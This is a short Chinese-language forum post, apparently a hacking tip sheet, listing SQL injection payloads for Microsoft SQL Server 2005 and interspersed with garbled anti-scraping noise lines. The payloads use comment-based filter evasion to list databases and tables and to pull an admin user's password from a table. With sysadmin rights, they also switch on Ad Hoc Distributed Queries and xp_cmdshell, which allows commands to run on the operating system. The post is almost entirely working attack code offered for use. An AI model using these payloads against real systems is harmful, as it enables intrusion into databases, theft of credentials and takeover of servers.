MSsql2005注入语句

admin

% [5 Z. A: B& T
: v2 [$ R0 O, t: v! e[Copy to clipboard]CODE:
) J- h8 H/ f, s. r/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
& u- q+ z2 e& d6 P) j) X
9 R' s( D/ ^' p" p$ K$ ]. v3 T; |$ Z爆表语句,somedb部份是所要列的数据库，红色数字1累加

. l* [' n) v) g; y; |3 Q( ]
% k6 f  l4 U( X" ~7 C[Copy to clipboard]CODE:
  P8 n7 `, ~9 C2 @* i/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
$ ^. ]% P& g2 J
爆字段语句，爆表admin里user='icerover'的密码段

* P0 K3 S; {& y5 L+ }/ E. L, z* [
8 O8 X2 U6 v. G  z  Q4 X  n8 N3 r[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
! {1 ?8 `" f5 t# e6 B/ v
0 U& _; Q) L* }mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
开启openrowset

) z' C3 s9 a# \4 X2 R) e- S9 g+ B" W
[Copy to clipboard]CODE:
* O0 V5 N1 l1 v/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

& }( [+ l8 X4 m; L/ a2 ~1 ]5 k  o开启xp_cmdshell
" y& t5 n- I2 l

+ z0 k3 g1 K; |: |3 G- W[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

& v0 V' f' M) n7 m- c! l6 N7 s/ Qok,over~~晚安